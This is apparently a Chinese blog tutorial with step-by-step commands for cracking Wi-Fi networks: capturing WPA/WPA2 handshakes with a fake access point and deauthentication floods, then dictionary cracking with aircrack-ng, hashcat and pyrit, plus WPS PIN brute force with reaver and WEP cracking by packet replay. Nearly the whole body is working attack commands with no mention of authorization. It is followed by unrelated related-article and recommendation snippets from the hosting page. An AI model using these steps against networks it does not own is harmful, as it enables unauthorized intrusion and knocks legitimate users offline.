话不多说,先来看看字典破解 wpa2 的效果

===================================

===============================================
字典破解 wifi-wpa/wpa2
目前最常用的加密类型
此方法只适合破解弱口令
其他暴力破解伤CPU/GPU
===============================================
1. 安装aircrack-ng
   1. 直接使用apt-get,但有的软件仓库不是最新版
   2. 源码安装 http://www.aircrack-ng.org/
      * 现在要翻一下才能下载

2. 无线网卡开启monitor(建议另外使用usb无线网卡)
  > sudo ifconfig wlan0 down
  > sudo iwconfig wlan0 mode monitor

3. 查看无线网络,选择对象BSSID和CHN(通道),同时记下ESSID
  > sudo airodump-ng wlan0

4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
  > sudo airodump-ng -w wpa2 -c CHN --bssid BSSID wlan0
  * -w 为保存的抓包文件的前缀
  * -c 为前面记录的通道

5. 创建fake AP(可以加快获取握手报文)
  > sudo airbase-ng -a BSSID --essid ESSID -c CH -Z 4 -W 1 wlan0
    * 如果是wpa  一般是  -z 2  z小写(TKIP)
    * 如果是wpa2 一般是  -Z 4  Z大写(CCMP)

6. 向该网络内广播解除认证报文
  > sudo aireplay-ng -0 0 -a BSSID -c CLIENTID --ignore-negative-one wlan0

7. 等待handshake
  > 步骤4中右上脚显示收到handshake报文
  > 使用aircrack-ng *.cap 探测是否包含handshake
  > 当包含handshake报文时停止4,5,6

以下使用三种软件破解:
aircrack-ng
------
1. 开始破解
   > aircrack-ng *.cap -w dict
   * dict为字典文件,每一行一个密码

hashcat
-------
1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
   > wpaclean out.cap wpa2-01.cap
   > aircrack-ng out.cap -J done

2. 开始破解
   > hashcat -m 2500 done.hccap dict

pyrit
-------
1. 开始破解
   > pyrit -r wpa2-01.cap -i dict attack_passthrough

===========================================
通过PIN破解wifi
此方法需要wifi开启wps功能,且信号尽量好
目前大部分厂家的无线路由器默认是关闭wps的
同时也具有防PIN的功能
所以现在此方法用得不多了
===========================================

1. 网卡配置参考wpa/wpa2破解

2. 查看开启WPS的无线网络,选择对象BSSID
  > sudo airodump-ng --wps wlan0

3. 开始破解
  > sudo reaver -i wlan0 -b BSSID -vv
  * 根据实际环境可以改变pin的间隔时间

4. 漫长的等待

============================================
WEP加密方式破解
如果有WEP加密的wifi基本都可以很快破解
但是很不幸,这种加密方式已很难见到
但是还是学习下
============================================
1. 网卡配置参考wpa/wpa2破解

2. 查看无线无线网络,找到加密方式为WEP的wifi, 记录对象BSSID
  > sudo airodump-ng wlan0

3. 对指定对象进行dump
  > sudo airodump-ng -w wep -c 10 --bssid BSSID wlan0

4. 向对象发送请求以获取更多的报文
  > sudo aireplay-ng -1 0 -a BSSID wlan0
  * 此步骤可选择攻击方式很多,可以自行man一下

5. 读取网络中的报文(读取上万后即可停止)
  > sudo aireplay-ng -3 -b BSSID wlan0

6. 进行破解,利用当前目录下的.cap文件
  > aircrack-ng wep-01.cap

7. 如果第6步破解失败,则重复5-6

[WIFI] WIFI 破解(初级)的更多相关文章

  1. WiFi密码破解CDlinux

    好了,先说下提前要准备的东东吧:1.U盘一枚,最小1G空间.需进行格式化操作,提前保存内部文件.2.CDlinux镜像.帖子最后会提供一枚8月最新修改版,共135M. 1.CDlinux U盘启动  ...

  2. 【WiFi密码破解详细图文教程】ZOL仅此一份 详细介绍从CDlinux U盘启动到设置扫描破解-破解软件论坛-ZOL中关村在线

    body { font-family: Microsoft YaHei UI,"Microsoft YaHei", Georgia,Helvetica,Arial,sans-ser ...

  3. WiFi密码破解详细图文教程

    每天都能看到有不少网友在回复论坛之前发布的一篇破解WiFi密码的帖子,并伴随各种疑问.今天流云就为大家准备一篇实战型的文章吧,详细图文从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描 ...

  4. Wifi密码破解

    Wifi密码破解1:通过字典(暴力)破解WIFI密码   简单破解WEP/WPA/WPA2加密的WIFI密码,平台kali-linux 工具:Aircrack-ng 过程很简单:先抓含有正确密码的握手 ...

  5. aircrack-ng wifi密码破解

    wifi密码破解 步骤1:查看网卡信息 ifconfig 找到你要用到的网卡 步骤2:启动网卡监听模式 airmon-ng start wlan0 我的是wlp2s0 步骤三:查看网卡变化 wlan0 ...

  6. Kali对wifi的破解记录

    好记性不如烂笔头,记录一下. 我是在淘宝买的拓实N87,Kali可以识别,还行. 操作系统:Kali 开始吧. 查看一下网卡的接口.命令如下 airmon-ng 可以看出接口名称是wlan0mon. ...

  7. 15款免费WiFi入侵破解安全测试工具

    以下是的15款免费(接近免费)的WiFi网络入侵测试工具.这些工具将帮你发现流氓AP,弱Wi-Fi密码等安全隐患,在黑客光临之前把漏洞补上. 一.Vistumbler扫描器 Kismet是一个开源的W ...

  8. CDLinux环境下WiFi密码破解

    > 准备好所需软件以及上篇教程中使用Fbinstool制作的可启动U盘 2 > 解压CDLinux-0.9-spring-0412.iso到U盘的根目录  如图 3 > 打开fbin ...

  9. wifi密码破解方法总结(含破解软件下载链接)

    眼下网上流行有非常多无线password的破解方法,总结起来最有用的还是这两种:第一种是Wirelessnetview+WinAirCrackPack软件组合,这个方法简单方便:另外一种就是大家熟悉的 ...

随机推荐

  1. php-config 介绍

    php-config php-config 是一个简单的命令行脚本用于获取所安装的 PHP 配置的信息. 在编译扩展时,如果安装有多个 PHP 版本,可以在配置时用 --with-php-config ...

  2. 判断list为空的条件

    if(list!=null&&!list.isEmpty()){                    hql.append(" and (status = ? or sta ...

  3. CSRF简单介绍及利用方法

    x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的.根据HTTP请 ...

  4. PHP 初探

    由于不可描述的原因,需要运行一个PHP项目,折腾了半天却无甚效果---概念缺失. 一怒之下,决定还是先了解下PHP本身再说.先得感谢下W3School,介绍简洁明了. PHP是脚本语言! PHP不需要 ...

  5. Android4.4 Framework分析——getContentResolver启动ContentProvider的过程

    ContentProvider的创建通常是在第一次使用的时候. 没时间分析,可參考老罗的分析 http://blog.csdn.net/luoshengyang/article/details/696 ...

  6. par函数family参数-控制文字的字体

    family用于控制文字的字体, 标准的取值范围为serif, sans, mono, 其中sans 为默认值 基本用法,代码示例: par(mfrow = c(1,3)) par(cex = 1.5 ...

  7. java导出word文件

    java导出word文件 test5.ftl文件生存方法, 第一步:用word新建test5.doc,填写完整模板,将需导出数据用${}代替 第二步:将test5.doc另存为test5.xml 第三 ...

  8. TTCN中PTC的执行流程

    一些概念 Component(測试组件或者測试成分),TTCN接触下来最频繁的就是MTC(Main Test Component,主測试组件),在执行測试用例前,须要首先创建一个MTC.在testca ...

  9. mybatis由浅入深day02_8spring和mybatis整合

    8 spring和mybatis整合 8.1 整合思路 需要spring通过单例方式管理SqlSessionFactory.mapper接口. spring和mybatis整合生成代理对象,使用Sql ...

  10. Effective C++ Item 16 Use the same form in corresponding uses of new and delete

    1. When you created an array and want to return the memory to system. You need to explicitly add [] ...